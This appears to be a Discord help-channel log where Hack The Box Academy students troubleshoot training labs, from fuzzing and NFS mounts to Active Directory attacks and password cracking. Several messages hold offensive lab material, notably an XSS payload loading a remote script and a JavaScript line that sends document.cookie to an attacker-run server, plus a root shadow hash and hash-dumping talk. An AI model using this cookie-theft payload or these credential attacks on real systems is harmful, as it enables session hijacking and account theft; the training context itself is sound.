could anyone give me a nudge for the parameter logic bugs skill assessment? i'm assuming its related to || coupon|| ? but i keep getting the error || invalid||. is it a rabbit hole?

not confusing at all

you want me to send you scrshots in pm?

sure

Hi
Im doing attacking common services
"Other notable applications"
I found an unauthenticated RCE via GET request but when i execute commands i dont get any output
When i send a web request to my NC listener i do see headers in the terminal
However i cant get a Reverse shell
Any ideas?

so i'm trying to sign into the HTB academy but it thinks i'm a bot, and it wants me to submit a form that doesn't exist! what am i missing here??

Don’t expose ur credentials here

the email is public anyway

you are exposing the num of digits of your passwords as well

try turn off your vpn, or close all instances of your browser and try again it happened to me 2 days ago

correct, but it's complexity is very high to the point i thought it is no use of brute forcing or something so didn't bother hiding it, but cautious is required 🙂

ok

Sorry wasn't identified and was redirected here without seeing it..you may delete the comment

No matter how good is ur password and stuff there are some skilled people out there just be safe 🌹

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

not working

Can someone help me out?

i didn't see the issue, if you're trying to fuzz an application, and your list isn't including what you're looking for, then either the list is invalid in the parameter you are fuzzing and should try another list, or you are looking into an incorrect parameter.

which module is it

the module in academy would sometimes include the wordlist for you to enumerate at the bottom to save you some time

1 second

No problem.
If you want to delete your post, you can do it yourself. I only delete posts if they violate the rules.

about the openVPN connection type.. when should you consider using TCP instead of UDP? Cause I feel like TCP might be beneficial if the connection is unstable and keyboarding typing doesn't get recognized (you know, you type something on the cli of the target machine, but nothing appears in the command line). Could somebody shed some light on this?

I am by no means experienced enough to answer this, but I just experienced in the "Footprinting Lab - Easy" that i could not connect to the SSH service while being on UDP connection. Worked fine with TCP connection. On the otherhand, I had the same exact problem in another lab, but vice versa (UDP working, TCP not).

UDP works better in almost every situation. The difference is sometimes UDP traffic can be blocked by home wifi firewall or the ISP. So TCP works better there. A lot of hacking tools send massive amounts of small packets which makes TCP way slower than UDP

A small typo of the wordlist name in the login brute forcing module - Hybrid Attacks https://academy.hackthebox.com/module/57/section/489

#1234357888114364508

Hello, everyone! Can anyone give me a hint?https://discord.com/channels/473760315293696010/1371087282601197639

Greetings everyone

You can DM.

hello guys can you tell me please how can i mount NFS share? everytime i try to mount it tells me that permission is denied while accessing the share

it happens when i try to use v3 nfs. when i try to use with v2 (as hacktricks suggest me to do) it tells me that "requested NFS version or transport protocol is not supported"

sudo su then access the share after mounting

why cant I write on other channels except here

Get identified, instructions -> #welcome

thank you

finally! thank you so much!

Wrote)

Apologies for the off topic post here in advance. How can I gain 'permission' to post in the other discord channels here such as #general ?

Read and follow #welcome

Thanks! @acoustic owl

Hey, could anyone point me in the right direction for the command injection skills assessment?

yes whats up

check msg

You can read the file instead of trying to write over it.

Anybody ever had a problem with virtual box when it dosent detect any input ?

Im on ubuntu

Hi hi, I got a small question,
I'm currently doing the module for metasploit framework -> modules
there is an nmap output like

nmap -sV 10.10.10.40

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:38 UTC
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.87 seconds

after this, the module explains port 445 is open (as seen in the nmap output) and instantly goes to booting up msf to run MS17_010. Is there a way how i should make this connection? should this be 'common knowledge' to know what exploit to run when seeing an nmap output like this one ?

No, it's not 'common knowledge' to know what exploit to use simply from an nmap scan. You need to know which services are running, inspect them all, interact with them, try to get the version and see if there are any explots for it, etc. In this case, 445 simply means it's running SMB which is for file sharing. The first thing I'd try with something like that is connecting to the share to see which files, if any, are available to guest/anonymous users if I don't have credentials. You can try something like eternalblue, but that's like super low hanging fruit and 99.99% of the time it's not going to work.

thank you, i guess it's for the sake of the module that they push eternalblue so you use msfconsole. i just found the jump odd considering there was nothing that signifies the exploit and the next step... is the exploit 😅

yeah i think it's just showcasing it and it's an 'easy' exploit

@minor plover how about no

yeah okay sure

This might be a dumb question but if you are using the virtual instance by connecting via the browser you do not need to use a VPN correct?

The pwnbox does not require connecting to the VPN, it uses your VPN file to connect automatically.

hey, has anyone eles had issues with the Web Requests -GET Target System, when you go into the browser web developer tool and run the search you do not get the request for the Search.php come through

Did you open the dev tools first, then navigate/refresh the site, or did you open devtools afterwards? You need it open before you make the request I think.

Thanks for the reply, I am getting the issue "too many fingerprints" on the nmap OS detection challenge and I read on the HTB forums it can be due to incorrect VPN but it seems it is not releavant here.

i opened and refreshed then made the search request and got nothing

I will figure it out

Yeah I'd make sure you're targeting the right thing. I'm reading that error simply means namp can't determine the OS.

even when i had a scan through the walk through help i had done everything correct just no search would be requested

make sure you have spun up the new target and not trying to target an old one from your clipboard

i have done thisn plenty of times

And you're in the network tab?

yes

That should show any requests you make.

i know but i kept getting 403 404

well 404 means page can't be found, but you should still see the request in devtools

ill redo it now and see if it happened again and send SS if it happens

but was jsut wondering if anyone eles was having the same issue

ive managed to get past it now as i already new to use the ||?search=flag|| to get what i needed

ey guys good evening still i'm stuck hahahaha day 65 xD

the life of hacker is very hard xD

anyone here also having issues with psexec.py?

python3 /usr/share/doc/python3-impacket/examples/psexec.py  inlanefreight.local/REDACTED:'REDACTED'@172.16.XX.XX
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/psexec.py", line 33, in <module>
    from impacket import version, smb
  File "/usr/lib/python3/dist-packages/impacket/version.py", line 10, in <module>
    import pkg_resources
  File "/home/REDACTED/.local/lib/python3.13/site-packages/pkg_resources/__init__.py", line 2191, in <module>
    register_finder(pkgutil.ImpImporter, find_on_path)
                    ^^^^^^^^^^^^^^^^^^^
AttributeError: module 'pkgutil' has no attribute 'ImpImporter'. Did you mean: 'zipimporter'?

what if you just do impacket-psexec?

$ impacket-psexec                                         
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/psexec.py", line 33, in <module>
    from impacket import version, smb
  File "/usr/lib/python3/dist-packages/impacket/version.py", line 10, in <module>
    import pkg_resources
  File "/home/REDACTED/.local/lib/python3.13/site-packages/pkg_resources/__init__.py", line 2191, in <module>
    register_finder(pkgutil.ImpImporter, find_on_path)
                    ^^^^^^^^^^^^^^^^^^^
AttributeError: module 'pkgutil' has no attribute 'ImpImporter'. Did you mean: 'zipimporter'?

should i simply update impackket-psexec?

Try Python 3.10 or 3.13, looks like 3.13+ removed pkgutil.ImpImporter which impacket needs.

so what happens if new students use 3­.13+ on newer kali machines?

You can use an older version of python. You can have more than one version installed. As for your kali question, idk, I'm on the latest kali and don't get that error. maybe update python? i'm on 3.13.2

ill just update my whole kali

im in the 2024.1 version

ahh yeah that could be it

thanks for the heads up though, im more confident reinstalling everthing since it should work with newer installations now that you mention using 3.13.2

😂

thats a new one

Can somebody help me with the HTTP Response splitting please? I can successfully set my own cookie with Set-Cookie and steal it to the logs, but for some reason when I send this crafted payload url to the admin it just logs the entire url instead? I dont understand.

might be the wrong place to ask but does UTM VMs still work on M1 chip macs with sonoma ?

Yup

No issues here

thank you

i did not want to be paying for parelles 😂

UTM is awesome

ultra theft midtown

wwait this isnt general

In the HTTP Response Splitting why is it when im sending my link that works to the admin its just getting logged instead of executing?

The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
Skills Assessment - Using Web Proxies

Im having issues figuring out what to do right here

I know what im supposed to do, just cant seem to execute it

Am I supposed to be injecting into the log? then the admin visits the log?

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

Skills Assessment - Using Web Proxies

I'm trying to submit my model (skills_assessment.joblib) in the Applications of AI in Infosec module, but it keeps returning invalid model. Any help would be appreciated.

The CPTS module with creating shells threw me for a loop with the war exploit. Jeez

I have a problem with attacking common aplications with the attacking ColdFusion part, can someone help me?

hey everyone, wondering if people are bothering with installing a Windows VM? I completed the SOC analyst path completely in ParrotOS, but now starting to work on Sherlocks and one of them made me think if I should have a Windows VM ready to go for the exam. Specifically thinking about opening .evtx files or running Eric Zimmerman tools. I believe Unit42 sherlock write up is done on a Windows VM, and they just double-click/open an .evtx file. When I completed that sherlock, I parsed the file into raw xml file and ran grep on it through the terminal in ParrotOS.

I haven't taken CDSA nor taken the path so take this with a grain of salt, but I would prepare to use anything and everything taught in the path. If that requires access to a Windows machine, yes you'll probably want something setup with all the tools in place before you begin.

Is anyone familiar with mounting a bitlocker .vhd file

https://learn.microsoft.com/en-us/windows-server/storage/disk-management/manage-virtual-hard-disks

let me specialize my question. I am working on trying to mount a .vhd bitlocker via linux. from what I understand I need to use qemu-nbd and cryptsetup. I have a partition created under /dev/NBDop2 and when I attempt to use cryptsetup it mentions my partition is not a valid BITLK device. I made sure to make it a ext4 but I don't really see a exact answer of how to.

sudo cryptsetup bitlkOpen /dev/nbd0p2
Device /dev/nbd0p2 is not a valid BITLK device.

https://stackoverflow.com/questions/36819474/how-can-i-attach-a-vhdx-or-vhd-file-in-linux

found on google

probably easier to just do it in windows

I think i have a idea on how to bring it over. see the issue is the I can't exactly get into the users account but I can via SMB. so cmd. however I can rdp into the same computer but different user. I am currently uploading the vhd to the user with access.

via evil-winrm

I think then I can use what you recommend.

Um,what should I do here?

Hey everyone? I hope anyone can see my text

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

welp I see why now, I can't bring it to windows. any users are popped up with a UAC so I do need it to be mounted via linux to avoid the UAC.

On the Academy Modules Layout (https://academy.hackthebox.com/module/90/section/1559) in the pentesting job role, do I need to go through the list of recommened modules in order as someone who is entirely new to the world of IT and cybersecurity to be able to get a foothold on the subjects discussed in future modules?

Yes, no doubt about it.

maybe not all, e.g. JavaScript Obfuscation, or OSINT: Corporate Recon but mainly those in the InformationSecurityFoundations path

But in General I'd recommend doing the Information Security Foundations path before taking the Pentester Job path

Hello i am new here

Hi. Read the #rules and follow the instructions in #welcome to gain access to most of the channels.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi, does anyone having the same problem with me, I’m taking the applications of ai in infosec module, in the network anomaly section, I followed everything but I keep getting invalid model file, what is the problem?

Hi mate! I had a lot of probs with this as well, when you create a new project in VS, do NOT,

I repeat do NOT choose "new console application" from the rightmost panel, instead search for 'framework' in the rightmost panel (or pick the choise to the left if present named '.Net Framework'), then select "new console application (.NET Framework)".
Create the code, build (in release) and now you good to go.

I realized I did something wrong, since the file I generated before was not possible to run under the target-machine, either I got the "The application to execute does not exist: 'C:\Windows\tasks\NotMalware.dll'" or simply "You must install .NET to run this application." if the .dll was present.
So case is we built from the wrong .Net template, We built from .Net, should've built from .Net Framework.

Edit: layout of paragraphs.

Or you can spawn a PowerShell as the user you want and use your file transfer knowledge to get it back on a local Windows machine 😉

Hey, in the “ACL Enumeration” there is this command, but it’s taking forever to run… was able to run bloodhound and it took less time.
Anyone remembers if it takes that much time or if you ran a different command?

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $gpo_group_sid}

Sometimes these commands will pickup things that bloodhound misses, but yeah, they do usually take a little more time to run.

Yes thats normal, in Powershell can take a long time, maybe because its using 1 thread and bloodhound/sharphound using a lot more threads, but not 100% sure.

pm me

Hey, i'm at "Applications of AI in InfoSec" doing the "IMDB sentiment" skills assessment and ran into something odd (bug in Academy?).
I trained a simple scikit-learn model (TF-IDF + Logistic Regression), saved it with joblib, and it gets about 89 % accuracy when I test it locally.
The upload API reply always:

{
  "accuracy": 0.0,
  "metrics": null,
  "misclassified": []
}

So it looks like the model runs fine, but the accuracy number is 0.0%
Could someone take a quick look or let me know what i'm doing wrong?

Let me know if you want the exported file

I am on AD attacks & enum skill assessment 2, question 10. I found the user name from Bloodhound. I am struggling to find the hash. Can I get a nudge?

More or less how far into the Academy modules should we be to start working on HTB machines? Should I finish the PenTest path completely first?

I’m still waiting for any group admins or mod to reply me as if I use cmd with admin then I can see SeTakeOwnershipPrivilege disabled but if I try to Import-Module the elevate ps1 script it doesn’t even work in Powershell

There’s no way to achieve the desired output with the specific priv escalation method Untill if we manually use other tactics to owned the system

Think about what you did when you first started the SA, but now try something similar from windows.

Is the difference Linux vs Windows, or are ||the systems on different networks||?

You can DM

im stuck on Password Attacks - easy labs, i have tried crackmap and also hydra, to crack ftp with the given username.list and password.list/ also the mutated.list but nothing, if i could get a tip on this. I waited almost 2h for hydra for nothing.
Link: https://academy.hackthebox.com/module/147/section/1334

I would say that going through the starting point boxes is a great idea to start off with. Then, using 0xdf or ippsec walkthroughs to help you through the other boxes 🙂

You can DM the commands you've been trying.

Oh no I was definitely able to get it into the machine with ease the problem is starting up the mount drive is when UAC hits me

It’s a pain, using the resources is the correct move but it takes forever, I got a tad hint from a HTB forum I’d read those if I were you. But yea I spent 3 hours trying to wait till it cracked.

anything going on with modules right now? When I click the link to go into them, it's not working

nvm, was a glitch on my side apparently

Just leaving a tip in case someone is having trouble with RDP and SOCKS Tunneling with SocksOverRDP (Cannot connect to jason host)
You probably installed proxifier in the wrong host and is trying to connect from the wrong host too.

DM me

is the ai red teamer path going to become a cert eventually?

🤷‍♂️

Can anyone help with the Password attacks section Passwd,Shadow and Opasswd. I’m trying to crack the yescrypt hash with hashcat and John the ripper. Using a mutated password list. Any recommendations?

I think this is not necessary?

Which part

you have the credentials from Will?

Yeah I sshed in copied the back up files to my attack box

I’m trying to crack the root hash in the shadow file

the .bak files?

I’ve tried what feels like everything

Yeah

Using hashcat it would say token length exception

it should work with john and the mut_password list

Evan bro give me a DM if you can't figure any thing out with black sky👍

try john

Will do

Great

I’m running it right now

Hi All, qq im getting an error when running gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Error: error on running gobuster: unable to connect to http://83.136.252.13/: Get "http://83.136.252.13/": dial tcp 83.136.252.13:80: connect: connection refused. in the Information Gathering - Web Edition Vhost section. any ideas? the target is spawn and i can ping it but does not seem to be able to enumerate the vhosts.

Did you add the IP-adress to ect/hosts file?

gobuster vhosts -u http://inlanefreight.htb:43995 -w /usr/share/seclists/Discovery/DNS/subdomains-topmillion-110000.txt --append-domain

I think it should be look like this

I ran John - -format= crypt /file path to shadow /hashes - -wordlist:/ mutpassword.list path

And nothing

In my hash folder it has root:$y$j9T$1FyAd7.T1R9XTboO8.W571$ZguG.oxTSdzTOP0zLUqsY4ONGApmQOfPYZjot4BGlm2:0:0:root:/root:/bin/bash

Hello 👋

Whenever I am trying to text something in off topic general it redirect me to this module section ? Why ? Is there is some criteria ? With I need to fullfill in this module ?

Did you solve it? 😄

working on crackmapexec skill assessment question 1.
I really need some advice.

1. indicates my chisel setup.
2. indicates the /etcproxychains4.conf socks5 at 1080, also treid sock4
3. indicates my attempt to nxc or crackmapexec trying access to nmap. I also tried different IPs, 172.16.15.1 - 172.16.15.10 but no luck. This has been 7 hours just tring to get the setup. I also tried differnt machines, mac and kali. Any pointer will be apprciated. feels like i am doing the same thing over and over again.

Hi, no i did not

I tried got same error

can someone help me pls, i got 2 virtual machines. First is htb virtual parrot and second is Windows. I need to transfer zip archive from linux to windows. But my Windows virtual machine doesnt got access to internet. How can i transfer zip??

@gloomy stump thanks, you where right, i needed to add the ip address to the host file so it could resolve the domain locally. Thanks for the help 🙂

you're welcome 🙂

Shared folder?

Hello Guys, So I am facing issue in Attacking Domain Trusts - Child -> Parent Trusts - from Windows in the active directory enumiration and attack module

the problem is after doing rdp into the attack machine there are no tools folder present

I have tried spawning new machines 3 to 4 times

If Your windows has ssh use SCP

scp /path/to/local/file username@windows_ip:/path/to/destination

😓

ty!

Anyone Please help

Transfer your tools? If you use xfreerdp use /drive:kali,,

I tried that but faced some issues, I will try again Thanks for the suggestion

Have you checked c:\tools?

If accessibility is the issue, there are a couple of ways to transfer files

SMB, RDP, HTTP

yes It was not there But I have transferd the tools now

after running the tools I face new issue

this indicates I dont have enough permission so dump the hash

it looks like they are in the C:\htb folder from the example

Thanks I found them. And sorry for wasting everyone's time

Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.

I done
"><script src=http://10.129.255.239:1337/script.js></script>
I opened a php server using "sudo php -S 0.0.0.0:1337"
I made the php file and the script.js file, the script.js will execute the php, the php script captures thew cookie for me

and didnt get anything

module: session hijacking

hello 🙂

Hello hibooxx

how are you 🙂

tired, been struggling with the module for a little

so close to completing but, struggling right now

which module ?

Cross-Site Scripting (XSS)

oww I've finished this one. What are you stuck on?

session hijacking

the javascript file doesn't seem to be executing

"><script src=http://10.129.255.239:1337/script.js></script>
'><script src=http://10.129.255.239:1337/script.js></script>

tried both common payloads

script.js is created , php file is created,

im also running the php server with "sudo php -S 0.0.0.0:1337"

it's obvious the imgurl input box is vulnerable, due to the contents im seeing

hmmm wait have you created an index.php to retrieve the request on your server?

yes

umm.... i think i found the issue lmao

I wasnt even in the directory

oh still didnt even capture the cookie

maybe you may have tested the wrong field

hmm okay let's try different ones

a tip: to test an xss, I put the payload on all the fields with the name of the field to see which field is vulnerable when the request is intercepted.

okay

http://10.129.255.239/hijacking/?fullname=asda&username=asdadawd&password=asjuhdanl&email=asdjubihan%40gmail.com&imgurl=asdawdas

got what was sent

so i test eachj input according to /fullname "

/username /password /email /imgurl ?

I mean on each field I would put for example ‘><script src=http://10.129.255.239:1337/fullname></script>

oh yeah

there will be an error on the server and the field will be vulnerable

Just did for each, and ensured changing /fullname to according field names and still got no response

mhmmmm is trying to relaunch the challenge

okay

spawning new IP

yess for a fresh server

I'm trying to do it again on my side as it's been a long time ahah

how long did it take you to get CPTS

1 year old lol I nearly lost my hair

damnn

no experience in penetration testing for the more experienced it takes less time

ooh i se

they gacve me the same new ip lol

Not getting anything still

what payload did you put in script.js?

this

new Image().src='http://10.129.255.239:1337/index.php?c='+document.cookie;

same ip and port being used

by pure chance try with a " for the following payload: "><script src=http://10.129.255.239:1337/fullname></script>, but it seems strange to me because you have the right method

He’s using the Target IP it looks like, should be sending it to your Attack Machine IP where the server listener is hosted

owh shit thank you, I forgot to ask for this precision, in fact you need to put your IP in the test payload xss

"><script src=http://YOURIP:1337/fullname></script>

wait so in the field it's my local ip?

in all fields to detect which field is vulnerable

same process just change the field

Captured the cookie it was suppoised to be the local ip, however, upon going into the storage it doesnt let me add it in

don't forget you must put the path vulnerable

done it

gj

on the final part the skills assessmentr

Hi, if I subscribe to the Gold Annual Plan, will I get one or two certificates? And if I don’t take the exam during the subscription period, will I lose the the exam chance?

Hi
I'm a beginner, and I would like to know the right way to start learning in this field. How should I begin? Are there any platforms that can help me become a professional? I hope to hear back from you.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

the annual plans come with a single voucher per year

SOC analyst course I am stuck for 2 weeks there, cant paste a screenshot here with an exact question and details, but can anyone help me with one assignment

guys I am having bigg isuue, can someone plese help

I read forums but it ddidnt work

I was following along the windows fundamentals and ran a command

Just mention the module/section/question you're on and what you've tried etc. You can post a screen shot only from tier 0 modules. Anything above that is against the rules. You can ask someone to take it to DM if you feel like you need to reveal more, but people have done the modules so they don't really need the context of screen shots etc.

this one on my /home//user/document

sudo mount -t cifs -o username=htb-student,password=YourPassword //SERVER_IP/"Company Data" /home/user/Desktop/

and suddenly my document folder is gone

everything in their vanished, all my notes and projects till now

Introduction To The Elastic Stack 2 assignments at the end - is this the right chat to ask? I dont have a permission to text in many of those chats here

like its their but nothing in it except a file which says this

[ViewState]
Mode=
Vid=
FolderType=Generic

this is fucked up, everything I had done till this point in time gone

This channel is for talk about the modules on HTB. If that's part of a module yes. To gain access to most of the channels on the server you need to follow the instructions in #welcome.

Can anyone narrow down the bruteforcing for "Find another valid user on the target GitLab instance."

Its literally rate limited and names.txt (for instance) is a massive list. HTB is sadistic for this

I did and it blocked my message

i copied my ID and it says it is blocked

soemone recommened me this discord that I can find help here

but I see many ppl are typing with problems and no one is helping

its gonna take time

is there any specific person that helps with htb modules

Nope, just whoever in the community wants to help

just ask your question and be patient

it is the whole assigment not one question. I will probably email hack the box I literally did nothing for 2 weeks because I dont know what to do.

that's not a module

did oyu mean introduction to threat hunting & hunting with elastic?

just articulate your question and ask and maybe someone can help.

Introduction To The Elastic Stack yes

how to do it: Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover". Then, click on the calendar icon, specify "last 15 years", and click on "Apply". Finally, choose the "windows*" index pattern. Now, execute the KQL query that is mentioned in the "Comparison Operators" part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain. I have no idea. I tried

i followed this of course

when I typed this http://[Target IP]:5601 it doesnt go anywhere - the captcha turns on and ask to indicate the hydrant- and this never ends, then busses etc and Im stuck there for 2 weeks always the same

Did yotu spawn the target and enter the IP of the target you spawned in place of Target IP?

then it tells me to do it again and again "try again

I downloaded whatever there was

opened the spawn machine typed that http target

oh what am I doing wrong

this file that i downloaded doest want to open

There's no download I think. You just visit the target you spawn on that port.

It's a web app

so I am stuck with captcha

it doesnt let me go any further

i don't remember any captcha, you should really specify exactly which module and section you're on

this one Introduction To The Elastic Stack: What Is The Elastic Stack? and the two bottom questions

ok that module is security monitoring & siem fundamentals

I also emailed them . Yes it is

soc analyst path

oh wow my login is displayed here just noticed that

I was so excited for this soc analyst and then I got stuck and tried over and over to move forward, read forums. And nothing worked

Anyone around willing to take a quick lookieloo at the Wordpress Skills Assessment in CBBH? It's acting like the Wordpress site's database is corrupted or maybe misconfigured or something.

what url are you putting in your browser

It works fine, you just need to wait an extra 5-10 mins for the elastic instance to startup

theres also nothing needed to download or login

yeah. hard to get info out of him though. i just tested and there is no captcha either.

sounds like he went to some phishing site instead

Hi, I had student subscription for a while now. I've been wondering if it s possible to stop the subscription and then go back to it ?
Since I will be a bit busy for this month to learn at academy. If I unsubscribe can I resubscribe as a student again ?

yes

Thank you

anybody with an idea how to change POST data on inttercepting web requests, bug bounty path, introduction to web proxies

in "web proxies" module there is a part with ZAP scanner
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'
i found the flag, but it does not wanna accept it
can anybody help me with it?

Have you checked if there's any trailing/leading spaces in your flag?

hooly, i had a space before the flag

thanks

Yall I'm making a pc to start my cyber security learning I am at 0 rn
My pc have these
32gb ram
1tb storage
Rtx 3060
Ryzen 5 5600x
Total cost 1000$

Is it good
?

swap the rtx 3060 out for a 5060ti, might as well there the same price

make sure you get the 16gb though

how much is the 5060 ti?

oh wow thats cheap

Hey guys, I want to give feedback regarding:

https://academy.hackthebox.com/module/75/section/763

What is the CVSS score of the public vulnerability CVE-2017-0144?

The question is unspecified, since the CVSS 3.0 score is around 8 and the expected value is based on CVSS 2.0 an therefore around 9.
You may want to specify it. If its not here to place feedback, please tell me were to correctly place it.

thx

Did you check the hint

Hey, if your answer is regarding my request, I have already found the answer. But the question should ask for CVSS2 to specify the expected value. I know its a beginners module, but I just want to improve the question.

Hey, After using psexec I got shell in DC but I am unable to naviagte to tools folder because whenever I use command dir it gives error and gets stuck every time. I need tools like mimikatz to dump hash for user

@neat crest

15 min for that captcha to disappear?

Captcha is blocking me it asks me to select fire hydrant for a few min and then nothing happens

@thorny kraken

I was thinking of powershell

My bad

No problem

Could you run it in powershell? Does that help?

Let me try

what module is this?

Active directory enumeration and exploitation and attacking domain trusts from child to parent using Linux

After launching poweshell and using ls still it got stuck

just dir C:\Users\Administrator\Desktop

Tools are not present in desktop

oh youre looking for tools